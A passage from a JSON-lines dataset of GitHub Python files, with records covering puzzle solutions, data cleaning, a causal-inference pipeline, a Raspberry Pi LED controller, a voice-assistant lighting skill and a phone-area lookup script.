\n\n    # Step 3: Create traffic flows for benign and attack traffic. 
\n\nif __name__ == \"__main__\":\n    main()","repo_name":"mattall/topology-programming","sub_path":"src/onset/simple_topo_examples.py","file_name":"simple_topo_examples.py","file_ext":"py","file_size_in_byte":6407,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"19515537194","text":"a,b = map(int, input().split())\nans=1\ni = a\ntable = []\nwhile i * i <= b:\n    if b%i == 0:\n        table.append(i)\n        table.append(b//i)\n    i += 1\ntable = list(set(table))\n","repo_name":"Neru-Neru/Atcoder","sub_path":"JPA_2/C.py","file_name":"C.py","file_ext":"py","file_size_in_byte":191,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"6785967723","text":"import pandas as pd\nimport string\n\ndef clean_data():\n    \"\"\"\n    Function that will clean up the raw data set\n    \"\"\"\n    df=pd.read_csv('DOHMH_New_York_City_Restaurant_Inspection_Results.csv') # read in data\n    df=df[pd.notnull(df['GRADE'])] # drop rows with grades missing\n    df=df[pd.notnull(df['GRADE DATE'])] # drop rows with grade date missing\n    df=df[df.GRADE != 'P'] # drop rows whose grade are P\n    df=df[df.GRADE != 'Z'] # drop rows whose grade are Z\n    df=df[df.GRADE != 'Not Yet Graded'] # drop rows whose grade are Not Yet Graded\n    df=df[df.BORO != 'Missing'] # drop rows whose Borough information is missing\n    df['GRADE DATE']=pd.to_datetime(df['GRADE DATE']) # convert string date time to python datetime format\n    return df\n\ndef test_grades(grade_list):\n    \"\"\"\n    Function that takes in a list of grades and calculates whether the restaurant is improving, declining or unchanging\n    \n    The intuition of this method is to check grades iteratively. Say a total score of zero at beginning. If improving, then add 1.\n    \n    If declining, then minus 1. If unchanging, then do nothing. After comparing all grades in the list iteratively, it will have a sum.\n    \n    Positive, Negative or Zero. If positive, then improving. If negative, then declining. 
If zero, then unchanging.\n \"\"\"\n value = lambda x: string.ascii_uppercase.index(x)+1 # mapping uppercase letters to integers starting from 1\n j=0 # initialize three values to store improving, declining or unchanging increments\n k=0\n l=0\n for i in range(len(grade_list)-1): # do comparison between every elements in the list until the last one\n if value(grade_list[i+1]) > value(grade_list[i]):\n j+=-1 # if declining and letter index gets larger, then minus 1\n elif value(grade_list[i+1]) == value(grade_list[i]):\n l+=0 # if unchanging and letter index keep the same, then do nothing\n elif value(grade_list[i+1]) < value(grade_list[i]):\n k+=1 # if improving and letter index gets smaller, then plus 1\n if j+k+l > 0:\n return 1 # if the sum is positive, then it is improving, return 1\n elif j+k+l == 0:\n return 0 # if the sum is zero, then it is not changing, return 0\n elif j+k+l < 0:\n return -1 # if the sum is negative, then it is declining, return -1\n\ndef test_restaurant_grades(camis_id, df):\n \"\"\"\n Function that takes in a particular camis_id and returns if the restaurant is improving, declining, or unchanging.\n \"\"\"\n df=df[df.CAMIS==camis_id] # subset the data with particular camis_id\n return test_grades(df['GRADE'].iloc[::-1].values.tolist()) # using the above function to calculate the index of improving, declining, or unchanging\n # using the grades in ascending order by date\ndef plot_nyc(df):\n \"\"\"\n Function that plots the total numbere of restaurants in NYC and five boroughs for each grade over time.\n \"\"\"\n df=df.groupby(['GRADE DATE', 'GRADE']) # subset the dataframe with only grade and grade date\n df=pd.DataFrame(df.size().unstack().fillna(0)) # transform the object into tabular with each grade counts, also fill in missing value with 0\n df.plot() # using the built in dataframe plot function\n \n\n\t\n\n\n","repo_name":"ky822/assignment10","sub_path":"wl1162/supplement.py","file_name":"supplement.py","file_ext":"py","file_size_in_byte":3322,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"6"} +{"seq_id":"41940864761","text":"from typing import List, Tuple\nfrom utils import read_aoc_input\n\ntarget_x = range(282, 315)\ntarget_y = range(-80, -44)\n\n# assert x_vel > 0 (therefore always just -= 1 (unless 0))\n# y_vel -= 1 each time\n\n\nvelocity = int\n\ndef follow_trajectory(i_x_vel, i_y_vel, step_count=4000) -> List[Tuple[int, int]]:\n x, y = 0, 0\n x_vel, y_vel = i_x_vel, i_y_vel\n steps = []\n for step in range(step_count):\n x += x_vel\n y += y_vel\n if x_vel != 0:\n x_vel -= 1\n y_vel -= 1\n steps.append((x, y))\n\n return steps\n\nheights = []\nfor x_vel in range(0, 400):\n for y_vel in range(-100, 100):\n traject = follow_trajectory(x_vel, y_vel)\n if any([x in target_x and y in target_y for x, y in traject]):\n heights.append((x_vel,y_vel))\n\nprint(len(heights))\n \n\n\n","repo_name":"james-seymour/aoc-2021","sub_path":"day_17_a.py","file_name":"day_17_a.py","file_ext":"py","file_size_in_byte":831,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"62221152","text":"from causallearn.search.ConstraintBased.FCI import fci \nfrom causallearn.utils.GraphUtils import GraphUtils\nfrom sklearn.datasets import load_breast_cancer\nimport numpy as np\nfrom src.causal_graph import CausalGraph\nfrom src.model import Model\n\ninitial_data = load_breast_cancer()\n\n# Causal variables generation\ncausal_graph = CausalGraph(initial_data_array=initial_data, \n 
class_used=True, \n no_d_sep=False, \n remove_common_causes=False, \n independence_test=\"fisherz\")\ncausal_graph.create_graph()\ncausal_graph.save_graph_as_figure()\ncausal_graph.save_graph_as_dot()\n\ncausal_graph.get_causal_relations()\n# causal_dataset = causal_graph.get_data_with_causal_variables()\nprint(f\"Initial DataFrame shape: {causal_graph.get_df().shape}\")\nprint(f\"Causal DataFrame shape: {causal_graph.get_causal_df().shape}\")\ncausal_graph.save_causal_df_as_csv()\ncausal_graph.save_df_as_csv()\n\n# Dataset selection\ncausal_df = causal_graph.get_causal_df()\ndf = causal_graph.get_df()\n\nselected_df = causal_df\n\n# Model training and evaluation\nmodel = Model(data=selected_df)\nmodel.preprocess_data()\nmodel.split_data()\nmodel.fit()\nmodel.predict()\npredictions = model.get_predictions()\ny_test = model.get_y_test()\nprint(\"------------------------------------\\n\")\nprint(\"Model predictions:\\n\")\nprint(f\"Predictions: \\n{predictions}\\n\")\nprint(f\"y_test: \\n{y_test.to_numpy()}\")\nprint(\"------------------------------------\\n\")\nprint(\"Model metrics:\\n\")\nmodel.calculate_accuracy()\naccuracy = model.get_accuracy()\nprint(f\"Accuracy: \\t{accuracy}\")\n\nmodel.calculate_precision()\nprecision = model.get_precision()\nprint(f\"Precision: \\t{precision}\")\n\nmodel.calculate_recall()\nrecall = model.get_recall()\nprint(f\"Recall: \\t{recall}\")\n\nmodel.calculate_f1()\nf1 = model.get_f1()\nprint(f\"F1: \\t{f1}\")\n\nmodel.calculate_confusion_matrix()\nconfusion_matrix = model.get_confusion_matrix()\nprint(f\"Confusion matrix: \\n{confusion_matrix}\")\n\nmodel.calculate_roc_auc()\nroc_auc = model.get_roc_auc()\nprint(f\"ROC AUC: \\t{roc_auc}\")\nprint(\"------------------------------------\")","repo_name":"csymvoul/causal_variables_generation","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2128,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"12688481278","text":"# https://leetcode.com/problems/ransom-note/\n\nfrom itertools import count\n\n\nclass Solution:\n def canConstruct(self, ransomNote: str, magazine: str) -> bool:\n mag_dict = {}\n for char in magazine:\n if mag_dict.get(char) is not None:\n mag_dict[char] += 1\n else:\n mag_dict[char] = 1\n print(mag_dict)\n for ele in ransomNote:\n if mag_dict.get(ele) is not None:\n if mag_dict.get(ele) > 0:\n mag_dict[ele] -= 1\n else: return False\n else: return False\n return True\n \n def canConstruct_optimized(self, ransomNote: str, magazine: str) -> bool:\n for ele in ransomNote:\n # print(ele)\n if ele in magazine:\n magazine = magazine.replace(ele, \"\", 1)\n else: return False\n # print(\"mag\", magazine)\n \n return True\n\n\nsolved = Solution()\nprint(solved.canConstruct_optimized(ransomNote=\"aa\", magazine=\"aab\")) # True\nprint(solved.canConstruct_optimized(ransomNote=\"aa\", magazine=\"ab\")) # False","repo_name":"zvovov/competitive_coding","sub_path":"leetcode/study_plan_data_structure/383_ransom_note.py","file_name":"383_ransom_note.py","file_ext":"py","file_size_in_byte":1119,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"21188558479","text":"lower = int(input().strip()) \r\nhigher = int(input().strip())\r\nresult = []\r\nsum1 = 0\r\nfor i in range(lower, higher + 1):\r\n split = []\r\n sq = i * i \r\n arr = str(sq)\r\n length = len(arr) // 2\r\n if length == 0:\r\n split = arr\r\n else:\r\n split.append(arr[0 : length]) # appending the d 
digits in list\r\n split.append(arr[length : ]) # and the other d digits in the list\r\n split = map(int, split) \r\n sum1 = sum(split) # summing digits after appending them\r\n if sum1 == i: # checking the kaprekar condition\r\n result.append(i)\r\nif result:\r\n print(' '.join(map(str, result)))\r\nelse:\r\n print(\"INVALID RANGE\")\r\n\r\n","repo_name":"AhmedMaherTohmay/IEEE-ZSB-Technica1-Rookies-23","sub_path":"task7/p6.py","file_name":"p6.py","file_ext":"py","file_size_in_byte":700,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"71745851707","text":"\n\nclass Animal:\n def __init__(self, nombre, color, sexo):\n self.nombre = nombre\n self.color = color\n self.sexo = sexo\n self.horas_sueno = 0\n self.horas_juego_ind = 0\n self.horas_juego_grup = 0\n self.comidas = 0\n self.horas_regaloneo = 0\n\n def set_parametros(self, animal):\n if animal.personalidad == 'juguetona':\n self.horas_sueno = 8 * animal.expresion\n self.horas_juego_ind = 1 * animal.expresion\n self.horas_juego_grup = 7 * animal.expresion\n self.comidas = 4 * animal.expresion\n self.horas_regaloneo = 4 * animal.expresion\n else:\n self.horas_sueno = 12 * animal.expresion\n self.horas_juego_ind = 5 * animal.expresion\n self.horas_juego_grup = 1 * animal.expresion\n self.comidas = 4 * animal.expresion\n self.horas_regaloneo = 2 * animal.expresion\n\n def jugar(self):\n pass\n\n def comer(self):\n pass\n\n def __str__(self):\n return \"Me llamo {}, soy {} y tengo el pelo {}.\".format(self.nombre, self.sexo, self.color)\n\n\nclass Gato(Animal):\n def __init__(self, nombre, color, sexo):\n super().__init__(nombre, color, sexo)\n\n def maullar(self):\n print(\"Miauuu!! Miauuu!\")\n return\n\n def jugar(self):\n print(\"Humano, ahora, juguemos.\")\n return\n\n def comer(self):\n print(\"El pellet es horrible. Dame comida en lata.\")\n return\n\n\nclass Perro(Animal):\n def __init__(self, nombre, color, sexo):\n super().__init__(nombre, color, sexo)\n\n def ladrar(self):\n print('Guau!! 
Guau!!')\n return\n\n def jugar(self):\n print('Tirame la pelota :)')\n return\n\n def comer(self):\n print('Mami :) Quiero comeeeerr!!')\n return\n\n\nclass SiamePUC(Gato):\n def __init__(self, expresion, nombre, color, sexo):\n super().__init__(nombre, color, sexo)\n self.expresion = expresion\n self.personalidad = 'egoista'\n if self.sexo == \"Hembra\":\n self.expresion *= 1.5\n self.set_parametros(self)\n\n def comer(self):\n print(\"Quiero comida.\")\n super().comer()\n super().maullar()\n\n\nclass GoldenPUC(Perro):\n def __init__(self, expresion, nombre, color, sexo):\n super().__init__(nombre, color, sexo)\n self.expresion = expresion\n self.personalidad = 'juguetona'\n if self.sexo == \"Hembra\":\n self.expresion *= 0.9\n else:\n self.expresion *= 1.1\n self.set_parametros(self)\n\n def jugar(self):\n print(\"Quiero jugar.\")\n super().jugar()\n self.ladrar()\n\n\nclass PUCTerrier(Perro):\n def __init__(self, expresion, nombre, color, sexo):\n super().__init__(nombre, color, sexo)\n self.expresion = expresion\n self.personalidad = 'egoista'\n if self.sexo == \"Hembra\":\n self.expresion *= 1\n else:\n self.expresion *= 1.2\n self.set_parametros(self)\n\n def comer(self):\n print(\"Quiero comer.\")\n super().comer()\n self.ladrar()\n\n\ndef estadisticas(animales):\n sueno, juego_ind, juego_grup, comidas, horas_regaloneo = 1000, 1000, 0, 0, 0\n for animal in animales:\n if animal.horas_sueno < sueno:\n sueno = animal.horas_sueno\n if animal.horas_juego_ind < juego_ind:\n juego_ind = animal.horas_juego_ind\n if animal.horas_juego_grup > juego_grup:\n juego_grup = animal.horas_juego_grup\n comidas += animal.comidas\n horas_regaloneo += animal.horas_regaloneo\n print('''Tiempo de sueno: {}\\nTiempo de juego individual: {}\nTiempo de juego grupal: {}\\nCantidad de comidas: {}\nTiempo de regaloneo: {}\n'''.format(sueno, juego_ind, juego_grup, comidas, horas_regaloneo))\n return \n \nif __name__ == '__main__':\n animals = list()\n animals.append(GoldenPUC(expresion=0.5, nombre=\"Mara\", color=\"Blanco\", sexo=\"Hembra\"))\n animals.append(GoldenPUC(expresion=0.9, nombre=\"Eddie\", color=\"Rubio\", sexo=\"Macho\"))\n animals.append(SiamePUC(expresion=0.9, nombre=\"Felix\", color=\"Naranjo\", sexo=\"Hembra\"))\n animals.append(PUCTerrier(expresion=0.8, nombre=\"Betty\", color=\"Café\", sexo=\"Hembra\"))\n\n for a in animals:\n print(a)\n a.jugar()\n a.comer()\n \n estadisticas(animals)\n","repo_name":"isidoravs/iic2233-2016-2","sub_path":"Actividades/AC02/AC02.py","file_name":"AC02.py","file_ext":"py","file_size_in_byte":4434,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"37970045539","text":"'''\nVarious exercises of an RGB led\n'''\n\nimport RPi.GPIO as GPIO\nfrom time import sleep\nfrom numpy import interp\n\npin_R = 33\npin_B = 35\npin_G = 37\n#pin_W = 22 \nstate = False\n# Values are dimming. 
0 = Full power, 100 = off, going from max power up to 100\n\nOFF = 0\n\nFREQUENCY = 100\n\n\n# Spectrum range\nSPEC_LOW = 380\nSPEC_HIGH = 750\n\nclass PWM(object):\n\n def __init__(self, logger=None):\n\n GPIO.setwarnings(False)\n GPIO.setmode(GPIO.BOARD)\n\n\n GPIO.setup(pin_R, GPIO.OUT)\n GPIO.setup(pin_G, GPIO.OUT)\n GPIO.setup(pin_B, GPIO.OUT)\n\n GPIO.output(pin_R, GPIO.LOW)\n GPIO.output(pin_G, GPIO.LOW)\n GPIO.output(pin_B, GPIO.LOW)\n\n self.pwm_R = GPIO.PWM(pin_R, FREQUENCY)\n self.pwm_G = GPIO.PWM(pin_G, FREQUENCY)\n self.pwm_B = GPIO.PWM(pin_B, FREQUENCY)\n\n self.pwm_R.start(0)\n self.pwm_G.start(0)\n self.pwm_B.start(0)\n #print(\"off\")\n self.set_lights(OFF, OFF, OFF, OFF)\n \n def spectrum(self):\n # display the full spectrum\n for x in range(SPEC_LOW, SPEC_HIGH):\n # get spectrum as 0-1 values\n r, g, b = self.spectrumToRGB(x)\n # map 0-1 to pwm value\n #r1 = map(r, 0, 1, 0, 100)\n #g1 = map(g, 0, 1, 0, 100)\n #b1 = map(b, 0, 1, 0, 100)\n r1 = round(r*100, 1)\n g1 = round(g*100, 1)\n b1 = round(b*100, 1)\n print(r1, g1, b1)\n # set the led\n self.set_lights(r1, g1, b1)\n sleep(.1)\n self.set_lights(OFF, OFF, OFF)\n \n def spectrumToRGB(self, w):\n # for a spectrum value, return the RGB as 0-1 value\n if w >= 380 and w < 440:\n R = -(w - 440.) / (440. - 380.)\n G = 0.0\n B = 1.0\n print(\"Violet\", R, G, B)\n elif w >= 440 and w < 490:\n R = 0.0\n G = (w - 440.) / (490. - 440.)\n B = 1.0\n print(\"Blue\", R, G, B)\n elif w >= 490 and w < 510:\n R = 0.0\n G = 1.0\n B = -(w - 510.) / (510. - 490.)\n print(\"Green\", R, G, B)\n elif w >= 510 and w < 580:\n R = (w - 510.) / (580. - 510.)\n G = 1.0\n B = 0.0\n print(\"Orange\", R, G, B)\n elif w >= 580 and w < 645:\n R = 1.0\n G = -(w - 645.) / (645. - 580.)\n B = 0.0\n print(\"Red\", R, G, B)\n elif w >= 645 and w <= 780:\n R = 1.0\n G = 0.0\n B = 0.0\n print(\"IR\", R, G, B)\n else:\n R = 0.0\n G = 0.0\n B = 0.0\n\n return R, G, B\n\n def sun(self, RISE=True):\n R1 = 110\n R2 = 190\n R3 = 250\n \n G1 = 108\n G2 = 140\n G3 = 215\n \n B1 = 135\n B2 = 175\n B3 = 160\n\n MAX = 50\n \n MIN = 1\n MAX = 50\n INC = 1\n \n if RISE:\n print(\"Sunrise\")\n for x in range(MIN, MAX, INC):\n w = R1 + x*(R2 - R1)/MAX\n r = round(map(w, 0, 256, 0, 100), 1)\n w = G1 + x*(G2 - G1)/MAX\n g = round(map(w, 0, 256, 0, 100), 1)\n w = B1 + x*(B2 - B1)/MAX\n b = round(map(w, 0, 256, 0, 100), 1)\n \n print(x, r, g, b)\n self.set_lights(r, g, b)\n sleep(0.5)\n print(\"Rise\") \n for x in range(MIN, MAX, INC):\n w = R2 + x*(R3 - R2)/MAX\n #print(\"R\", x, w, R2, R3)\n b = round(map(w, 0, 256, 0, 100), 1)\n \n w = G2 + x*(G3 - G2)/MAX\n g = round(map(w, 0, 256, 0, 100), 1)\n \n w = B2 + x*(B3 - B2)/MAX\n b = round(map(w, 0, 256, 0, 100), 1)\n print(x, r, g, b)\n self.set_lights(r, g, b) \n sleep(0.5)\n else:\n print(\"Sunset\")\n for x in range(MAX, MIN, INC*-1):\n w = R2 + x*(R3 - R2)/MAX\n r = round(map(w, 0, 256, 0, 100), 1)\n \n w = G2 + x*(G3 - G2)/MAX\n g = round(map(w, 0, 256, 0, 100), 1)\n \n w = B2 + x*(B3 - B2)/MAX\n b = round(map(w, 0, 256, 0, 100), 1)\n \n self.set_lights(r, g, b) \n sleep(0.5)\n print(\"Ending\") \n for x in range(MAX, MIN, INC*-1):\n w = R1 + x*(R2 - R1)/MAX\n r = round(map(w, 0, 256, 0, 100), 1)\n w = G1 + x*(G2 - G1)/MAX\n g = round(map(w, 0, 256, 0, 100), 1)\n w = B1 + x*(B2 - B1)/MAX\n b = round(map(w, 0, 256, 0, 100), 1)\n \n #print(r, g, b)\n self.set_lights(r, g, b)\n sleep(0.5)\n \n print(\"Done\")\n \n def set_lights(self, r, g, b, w=OFF):\n # change the duty cycle of the RGBW light\n #print(\"Set\", r, g, b)\n # 
don't accept setting with numeric value lower than MAX\n \n self.pwm_R.ChangeDutyCycle(r)\n self.pwm_G.ChangeDutyCycle(g)\n self.pwm_B.ChangeDutyCycle(b)\n \n def end(self):\n # turn off all the leds\n self.set_lights(OFF, OFF, OFF)\n self.pwm_R.stop()\n self.pwm_G.stop()\n self.pwm_B.stop()\n\n GPIO.cleanup()\n \n \n def kelvin(self):\n import KelvinRGB as K\n step_size = 100\n for i in range(0, 15000, step_size):\n #color = list(map(lambda div: div/255.0, convert_K_to_RGB(i))) + [1]\n #print(color)\n r, g, b = K.convert_K_to_RGB(i)\n r = round(map(r, 0, 256, 0, 100), 1)\n g = round(map(g, 0, 256, 0, 100), 1)\n b = round(map(b, 0, 256, 0, 100), 1) \n print(i, r, g, b)\n self.set_lights(r, g, b)\n sleep(0.25)\n \n def kelvin_sunrise(self):\n import KelvinRGB as K\n start = 12000\n end = 5500\n step_size = -100\n step = 100/abs((start - end)/100)\n step_count = step\n for i in range(start, end, step_size):\n #color = list(map(lambda div: div/255.0, convert_K_to_RGB(i))) + [1]\n #print(color)\n r, g, b = K.convert_K_to_RGB(i)\n r = round(map(r, 0, 256, 0, 100), 1)\n # add factor for intensity\n ri = round((r/100) * (step_count), 1)\n g = round(map(g, 0, 256, 0, 100), 1)\n gi = round((g/100) * (step_count), 1)\n b = round(map(b, 0, 256, 0, 100), 1)\n bi = round((b/100) * (step_count), 1)\n #print(i, r, g, b)\n #self.set_lights(r, g, b)\n \n print(i, ri, gi, bi, step_count) \n self.set_lights(ri, gi, bi) \n step_count = step_count + step\n sleep(0.25)\n \n \n def sun2(self, SUNRISE=True):\n import Sunset as s\n step_size = 1\n steps = 20\n # astronomical twilight\n print(\"Astronomical Twilight 1\")\n for step in range(0, steps, step_size):\n r, g, b = s.astronomical_twilight1(step, steps)\n #print(step, r, g, b)\n self.set_lights(r, g, b)\n sleep(0.25)\n print(\"Astronomical Twilight 2\")\n for step in range(0, steps, step_size):\n r, g, b = s.astronomical_twilight2(step, steps)\n #print(step, r, g, b)\n self.set_lights(r, g, b)\n sleep(0.25)\n # nautical twilight\n print(\"Nautical Twilight\")\n for step in range(0, steps, step_size):\n r, g, b = s.nautical_twilight(step, steps)\n #print(step, r, g, b)\n self.set_lights(r, g, b)\n sleep(0.25)\n print(\"Civil Twilight 1\")\n for step in range(0, steps, step_size):\n r, g, b = s.civil_twilight1(step, steps)\n #print(step, r, g, b)\n self.set_lights(r, g, b)\n sleep(0.25)\n print(\"Civil Twilight 2\")\n for step in range(0, steps, step_size):\n r, g, b = s.civil_twilight2(step, steps)\n #print(step, r, g, b)\n self.set_lights(r, g, b)\n sleep(0.25)\n \n \ndef map(value, R1_Low, R1_High, R2_Low, R2_High):\n # map one range of numbers to another range\n y = (value-R1_Low)/(R1_High-R1_Low)*(R2_High-R2_Low) + R2_Low\n return y\n\ndef test():\n # cycle the leds\n gl = PWM()\n try:\n\n while True:\n print(\"Red\")\n for r in range(0, 100):\n gl.set_lights(r, OFF, OFF)\n print(\"Cycle R\", r)\n sleep(0.1)\n gl.set_lights(OFF, OFF, OFF)\n print(\"Green\")\n for g in range(0, 100):\n gl.set_lights(OFF, g, OFF)\n print(\"Cycle G\", g)\n sleep(0.1)\n gl.set_lights(OFF, OFF, OFF)\n print(\"Blue\")\n for b in range(0, 100):\n gl.set_lights(OFF, OFF, b) \n print(\"Cycle B\", b)\n sleep(0.1)\n gl.set_lights(OFF, OFF, OFF)\n except KeyboardInterrupt:\n pass\n \n gl.end()\n \ndef test1():\n # Check minimum dimming\n print(\"Check dimming\")\n gl = PWM()\n gl.set_lights(1, 1, 1)\n sleep(10)\n gl.set_lights(100, 100, 100)\n sleep(10)\n \n gl.end()\n print(\"Done\")\n\ndef test3():\n # Run rainbow spectrum from Violet to Red\n gl = PWM()\n gl.spectrum()\n 
gl.end()\n \ndef test2(): \n # Run rainbow spectrum from Violet to Red\n gl = PWM()\n gl.sun()\n gl.sun(False)\n gl.end()\n \ndef test4(): \n # Run rainbow spectrum from Violet to Red\n print(\"Kelvin\")\n gl = PWM()\n gl.kelvin()\n gl.end()\n print(\"Done\")\n\ndef test5(): \n import Sunset\n print(\"Sunrise\")\n gl = PWM()\n gl.sun2()\n gl.end()\n print(\"Done\")\n\n \ndef test6():\n\n print(\"Dim\")\n sc_r = 21\n sc_g = 40\n sc_b = 82\n\n so_r = round(map(253, 0, 255, 0, 100), 1)\n so_g = round(map(94, 0, 255, 0, 100), 1)\n so_b = round(map(83, 0, 255, 0, 100), 1)\n \n r = so_r\n g = so_g\n b = so_b\n gl = PWM()\n \n for x in range(0, 50):\n r = r -1\n if r < 0:\n r = 0\n g = g -1\n if g < 0:\n g = 0\n b = b -1\n if b < 0:\n b = 0\n gl.set_lights(r, g, b)\n print(x, r, g, b)\n sleep(0.5)\n gl.end()\n print(\"Done\")\n \ndef test7():\n # Cycle colors in increasing brightness\n gl = PWM()\n s = 0.05\n for x in range(0, 101):\n print(x)\n gl.set_lights(x, OFF, OFF)\n sleep(s)\n gl.set_lights(OFF, x, OFF)\n sleep(s)\n gl.set_lights(OFF, OFF, x)\n sleep(s)\n\n gl.end() \n \ndef test9():\n # Increase white\n gl = PWM()\n gl.kelvin_sunrise()\n gl.end()\n \n \n \n \n\nif __name__ == \"__main__\":\n #test() # cycle all lights\n #test1() # check dimming\n #test2() # Sunrise\n #test3() # spectrum\n #test4() # kelvin\n #test5() # sunset\n #test6() # dimming\n test7() # increase cycle\n #test8() # incease white\n #test9() # Kelvin_Sunset\n\n","repo_name":"webbhm/FlaskExperiment","sub_path":"python/PWM_Test.py","file_name":"PWM_Test.py","file_ext":"py","file_size_in_byte":11365,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"24515986257","text":"#!/usr/bin/env python3\n\nfrom colors import css_colors\nfrom functools import wraps\nfrom snips_skill import *\nimport json, random, time\n\n\n_, ngettext = get_translations( __file__)\n\n\ndef require_capability( capability, response=_(\"That's impossible\")):\n 'Decorator to ensure a device capability'\n def wrapper( method):\n @wraps( method)\n def wrapped( client, userdata, msg):\n client.capability( msg.payload, capability, response)\n return method( client, userdata, msg)\n return wrapped\n return wrapper\n\n\ndef confirm( *args):\n return random.choice( 2 * args + CONFIRMATIONS)\n\n\nclass LightsSkill( MultiRoomConfig, Skill):\n \n 'Control lights and switches via zigbee2mqtt'\n \n LOCATION_SLOT = 'location'\n \n SETTINGS = {} # Stores device state, keyed by device name\n \n \n @topic( 'zigbee/+', payload_converter=json.loads)\n def status( self, userdata, msg):\n 'Collect zigbee2mqtt device status reports'\n self.log.debug( 'Payload: %s', msg.payload)\n device = msg.topic.split('/')[1]\n self.SETTINGS[ device] = msg.payload\n\n\n def get_status( self, payload, key):\n conf = self.get_room_config( payload)\n device = conf.get( 'device')\n if device:\n settings = self.SETTINGS.get( device)\n if settings is not None:\n return settings.get( key)\n \n\n def capability( self, payload, capability, response=_(\"That's impossible\")):\n 'Check against the config that a given device can handle the requested action'\n caps = self.get_room_config( payload).get( 'capabilities', '')\n if capability not in map( lambda s: s.strip(), caps.split( ',')):\n raise SnipsError( response)\n\n\n def switch( self, msg, args, response=_('done')):\n ''' Manipulate a device through zigbee2mqtt.\n If a confirmation is requested in the device config,\n send an audible reply.\n '''\n if self.all_rooms( msg.payload):\n 
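# Broadcast case: the intent addresses every room, so send the same command to each configured device before replying\n            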
for conf in self.configuration.values():\n device = conf.get( 'device')\n if device: self._switch( device, args)\n return response\n \n self._switch( self._get_device( msg.payload), args)\n if not self.in_current_room( msg.payload):\n return response\n\n\n def _get_device( self, payload, msg=_('unknown device')):\n conf = self.get_room_config( payload)\n device = conf.get( 'device')\n if device is None: raise SnipsError( msg)\n return device\n \n \n def _switch( self, device, args):\n base_topic = self.get_config().get( 'base_topic', 'zigbee2mqtt')\n topic = '%s/%s/set' % (base_topic, device)\n self.publish( topic, json.dumps( args))\n\n \n @intent( 'domi:LampenAusSchalten', silent=True)\n @min_confidence( 0.6)\n def switch_off( self, userdata, msg):\n if self.get_status( msg.payload, 'state') == 'OFF':\n return _('It is already off')\n return self.switch( msg, { 'state' : 'OFF' },\n confirm( _('switched off')))\n \n\n @intent( 'domi:LampenAnSchalten', silent=True)\n @min_confidence( 0.6)\n def switch_on( self, userdata, msg):\n args = { 'state' : 'ON' }\n if 'brightness' in msg.payload.slots:\n percent = msg.payload.slot_values['brightness'].value\n if percent < 5:\n return self.switch_off( userdata, msg)\n if percent <= 95:\n self.capability( msg.payload, 'brightness',\n _('This device can be only switched on or off.'))\n args[ 'brightness'] = 254 * percent / 100\n elif self.get_status( msg.payload, 'state') == 'ON':\n return _('It is already on')\n\n return self.switch( msg, args, confirm( _('switched on')))\n\n\n @intent( 'domi:FarbeWechseln', silent=True)\n @min_confidence( 0.6)\n @require_capability( 'color')\n @require_slot( 'color', prompt=_('which color?'))\n def change_color( self, userdata, msg):\n css_name = msg.payload.slot_values['color'].value\n if css_name not in css_colors:\n raise SnipClarificationError( _('which color?'), \n payload.intent.intent_name, 'color')\n \n r, g, b = css_colors[ css_name]\n return self.switch( msg, { 'state' : 'ON',\n 'color' : { 'r': r, 'g': g, 'b': b }})\n\n\n @intent( 'domi:LichtDimmen', silent=True)\n @min_confidence( 0.7)\n @require_capability( 'brightness',\n _('This device can be only switched on or off.'))\n @require_slot( 'action', prompt=_('brighter or lower?'))\n def dim_light( self, userdata, msg):\n\n brightness = self.get_status( msg.payload, 'brightness')\n if brightness is None:\n return _(\"That's currently not possible\")\n \n action = msg.payload.slot_values['action'].value\n conf = self.get_room_config( msg.payload)\n offset = conf.getint( 'dim_step', 50)\n if action != 'higher': offset = -offset\n brightness = max( min( 254, brightness + offset), 0)\n \n is_on = self.get_status( msg.payload, 'state')\n if is_on != 'ON' and offset > 0:\n return self.switch( msg,\n { 'state' : 'ON', 'brightness' : offset })\n \n if brightness <= 0:\n return self.switch( msg, { 'state' : 'OFF' })\n\n return self.switch( msg, { 'brightness' : brightness })\n \n\n @intent( 'domi:SzenenSchalten')\n def not_implemented( self, userdata, msg):\n return _('Not yet implemented')\n\n\n# Let's go!\nif __name__ == '__main__': LightsSkill().run()\n","repo_name":"dnknth/snips-lights","sub_path":"action-lights.py","file_name":"action-lights.py","file_ext":"py","file_size_in_byte":5684,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"43600632445","text":"#!/usr/bin/python \n# -*- coding: utf-8 -*-\n\nimport os\nimport requests\nimport time\nimport 
sys\nreload(sys)\nsys.setdefaultencoding(\"utf-8\")\n\nurl = \"https://tcc.taobao.com/cc/json/mobile_tel_segment.htm\"\n\ndef output(file, value):\n f = open(file, 'a')\n f.write(value)\n f.close()\n\ndef getAera(phone):\n tel = {'tel': phone}\n r = requests.get(url, params=tel)\n if (r.status_code == requests.codes.ok):\n response = r.text\n if response.find(\",\") > 0:\n provice = ((response.split(\",\")[1]).split(\":\")[1]).strip('\\'')\n return phone + \",\" + provice + \"\\n\"\n else:\n return phone + \",\\n\"\n else:\n return phone + \",\\n\"\n\n\n\nif __name__ == \"__main__\":\n\n with open(\"ebook-phone\", \"rb\") as f:\n for line in f:\n output(\"phone2area\", getAera(line.strip()))\n","repo_name":"benbiti/tools-sets","sub_path":"phone2area.py","file_name":"phone2area.py","file_ext":"py","file_size_in_byte":834,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"70655488831","text":"import os\nimport unittest\n\nfrom PIL import Image\n\nfrom hotools.pillow_tools import draw_str_at_center, 